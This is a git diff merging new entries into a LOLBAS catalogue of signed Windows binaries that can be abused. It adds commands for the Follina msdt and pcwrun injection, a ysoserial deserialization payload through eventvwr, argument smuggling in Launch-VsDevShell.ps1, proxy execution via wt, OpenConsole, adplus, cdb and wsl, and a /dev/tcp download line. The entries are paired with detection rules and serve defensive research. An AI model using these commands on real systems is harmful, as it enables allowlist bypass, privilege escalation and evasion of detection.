Merge pull request #2 from LOLBAS-Project/master

Merge LOLBAS-project
2024-12-27 07:18:05 +01:00 · 2022-11-14 12:29:05 +07:00 · 2022-11-14 12:29:05 +07:00 · ac294b0e97
commit ac294b0e97
parent 354553efa3 8452c1ca96
9 changed files with 161 additions and 10 deletions
--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@ -11,6 +11,13 @@ Commands:
    Privileges: User
    MitreID: T1548.002
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
+    Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
+    Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
+    Category: Execute
+    Privileges: Administrator
+    MitreID: T1202
+    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
  - Path: C:\Windows\System32\eventvwr.exe
  - Path: C:\Windows\SysWOW64\eventvwr.exe
@ -19,6 +26,7 @@ Code_Sample:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_uac_bypass_eventvwr.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
  - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml
  - IOC: eventvwr.exe launching child process other than mmc.exe
@ -26,8 +34,11 @@ Detection:
 Resources:
  - Link: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
  - Link: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
+  - Link: https://twitter.com/orange_8361/status/1518970259868626944
 Acknowledgement:
  - Person: Matt Nelson
    Handle: '@enigma0x3'
  - Person: Matt Graeber
    Handle: '@mattifestation'
+  - Person: Orange Tsai
+    Handle: '@orange_8361'
--- a/yml/OSBinaries/Msdt.yml
+++ b/yml/OSBinaries/Msdt.yml
@ -18,18 +18,27 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
+    Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
+    Usecase: Execute code bypass Application allowlisting
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
  - Path: C:\Windows\System32\Msdt.exe
  - Path: C:\Windows\SysWOW64\Msdt.exe
 Code_Sample:
  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
 Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_msdt.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
 Resources:
  - Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
  - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
  - Link: https://twitter.com/harr0ey/status/991338229952598016
+  - Link: https://twitter.com/nas_bench/status/1531944240271568896
 Acknowledgement:
-  - Person:
-    Handle:
+  - Person: Nasreddine Bencherchali
+    Handle: '@nas_bench'
--- a/yml/OSBinaries/Pcwrun.yml
+++ b/yml/OSBinaries/Pcwrun.yml
@ -11,14 +11,22 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: Pcwrun.exe /../../$(calc).exe
+    Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
+    Usecase: Proxy execution of binary
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
  - Path: C:\Windows\System32\pcwrun.exe
-Code_Sample:
-  - Code:
 Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_indirect_cmd_compatibility_assistant.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml
 Resources:
  - Link: https://twitter.com/pabraeken/status/991335019833708544
+  - Link: https://twitter.com/nas_bench/status/1535663791362519040
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
+  - Person: Nasreddine Bencherchali
+    Handle: '@nas_bench'
--- a/yml/OSBinaries/wt.yml
+++ b/yml/OSBinaries/wt.yml
@ -0,0 +1,22 @@
+---
+Name: wt.exe
+Description: Windows Terminal
+Author: Nasreddine Bencherchali
+Created: 2022-07-27
+Commands:
+  - Command: wt.exe calc.exe
+    Description: Execute calc.exe via Windows Terminal.
+    Usecase: Use wt.exe as a proxy binary to evade defensive counter-measures
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 11
+Full_Path:
+  - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe
+Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/add077b8f54474cbfa859cf45a1ca62be5462b0f/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml
+Resources:
+  - Link: https://twitter.com/nas_bench/status/1552100271668469761
+Acknowledgement:
+  - Person: Nasreddine Bencherchali
+    Handle: '@nas_bench'
--- a/yml/OSScripts/Launch-VsDevShell.yml
+++ b/yml/OSScripts/Launch-VsDevShell.yml
@ -0,0 +1,30 @@
+---
+Name: Launch-VsDevShell.ps1
+Description: Locates and imports a Developer PowerShell module and calls the Enter-VsDevShell cmdlet
+Author: 'Nasreddine Bencherchali'
+Created: 2022-06-13
+Commands:
+  - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsWherePath "C:\windows\system32\calc.exe"'
+    Description: Execute binaries from the context of the signed script using the "VsWherePath" flag.
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    OperatingSystem: Windows 10, Windows 11
+  - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; calc.exe ;"'
+    Description: Execute binaries and commands from the context of the signed script using the "VsInstallationPath" flag.
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1
+Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml
+Resources:
+  - Link: https://twitter.com/nas_bench/status/1535981653239255040
+Acknowledgement:
+  - Person: Nasreddine Bencherchali
+    Handle: '@nas_bench'
--- a/yml/OtherMSBinaries/Adplus.yml
+++ b/yml/OtherMSBinaries/Adplus.yml
@ -11,15 +11,41 @@ Commands:
    Privileges: SYSTEM
    MitreID: T1003.001
    OperatingSystem: All Windows
+  - Command: adplus.exe -c config-adplus.xml
+    Description: Execute arbitrary commands using adplus config file (see Resources section for a sample file).
+    Usecase: Run commands under a trusted Microsoft signed binary
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: All Windows
+  - Command: adplus.exe -c config-adplus.xml
+    Description: Dump process memory using adplus config file (see Resources section for a sample file).
+    Usecase: Run commands under a trusted Microsoft signed binary
+    Category: Dump
+    Privileges: SYSTEM
+    MitreID: T1003.001
+    OperatingSystem: All Windows
+  - Command: adplus.exe -crash -o "C:\temp\" -sc calc.exe
+    Description: Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.
+    Usecase: Run commands under a trusted Microsoft signed binary
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: All windows
 Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
 Code_Sample:
-  - Code:
+  - Code: https://gist.github.com/nasbench/e34ca2cd90e3a845a558a102a4f607da
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
  - IOC: As a Windows SDK binary, execution on a system may be suspicious
 Resources:
  - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
+  - Link: https://twitter.com/nas_bench/status/1534916659676422152
+  - Link: https://twitter.com/nas_bench/status/1534915321856917506
 Acknowledgement:
  - Person: mr.d0x
    Handle: '@mrd0x'
+  - Person: Nasreddine Bencherchali
+    Handle: '@nas_bench'
--- a/yml/OtherMSBinaries/Cdb.yml
+++ b/yml/OtherMSBinaries/Cdb.yml
@ -14,17 +14,24 @@ Commands:
  - Command: |
     cdb.exe -pd -pn <process_name>
     .shell <cmd>
-    Description: Attaching to any process and executing shell commands
+    Description: Attaching to any process and executing shell commands.
    Usecase: Run a shell command under a trusted Microsoft signed binary
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
+  - Command: cdb.exe -c C:\debug-script.txt calc
+    Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).
+    Usecase: Run commands under a trusted Microsoft signed binary
+    Category: Execute
+    Privileges: User
+    MitreID: T1127
+    OperatingSystem: Windows
 Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
 Code_Sample:
-  - Code:
+  - Code: https://gist.github.com/nasbench/d9c15864f1e21bdd8b7cf55997b45f4b
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_cdb.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
@ -35,6 +42,7 @@ Resources:
  - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
  - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
  - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
+  - Link: https://twitter.com/nas_bench/status/1534957360032120833
 Acknowledgement:
  - Person: Matt Graeber
    Handle: '@mattifestation'
@ -42,3 +50,5 @@ Acknowledgement:
    Handle: '@mrd0x'
  - Person: Spooky Sec
    Handle: '@sec_spooky'
+  - Person: Nasreddine Bencherchali
+    Handle: '@nas_bench'
--- a/yml/OtherMSBinaries/OpenConsole.yml
+++ b/yml/OtherMSBinaries/OpenConsole.yml
@ -0,0 +1,25 @@
+---
+Name: OpenConsole.exe
+Description: Console Window host for Windows Terminal
+Author: Nasreddine Bencherchali
+Created: 2022-06-17
+Commands:
+  - Command: "OpenConsole.exe calc"
+    Description: Execute calc with OpenConsole.exe as parent process
+    Usecase: Use OpenConsole.exe as a proxy binary to evade defensive counter-measures
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
+  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
+Detection:
+  - IOC: OpenConsole.exe spawning unexpected processes
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/9e0ef7251b075f15e7abafbbec16d3230c5fa477/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml
+Resources:
+  - Link: https://twitter.com/nas_bench/status/1537563834478645252
+Acknowledgement:
+  - Person: Nasreddine Bencherchali
+    Handle: '@nas_bench'
--- a/yml/OtherMSBinaries/Wsl.yml
+++ b/yml/OtherMSBinaries/Wsl.yml
@ -25,6 +25,13 @@ Commands:
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 19 Server
+  - Command: wsl.exe --system calc.exe
+    Description: Execute the command as root
+    Usecase: Performs execution of arbitrary Linux commands as root without need for password.
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 11
  - Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
    Description: Downloads file from 192.168.1.10
    Usecase: Download file
@ -37,11 +44,12 @@ Full_Path:
 Code_Sample:
  - Code:
 Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_wsl_lolbin.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/2a4e6d8ebeb07d294e6d16a083361bd7e53df7b3/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - IOC: Child process from wsl.exe
 Resources:
  - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+  - Link: https://twitter.com/nas_bench/status/1535431474429808642
 Acknowledgement:
  - Person: Alex Ionescu
    Handle: '@aionescu'
@ -49,3 +57,5 @@ Acknowledgement:
    Handle: '@NotoriousRebel1'
  - Person: Asif Matadar
    Handle: '@d1r4c'
+  - Person: Nasreddine Bencherchali
+    Handle: '@nas_bench'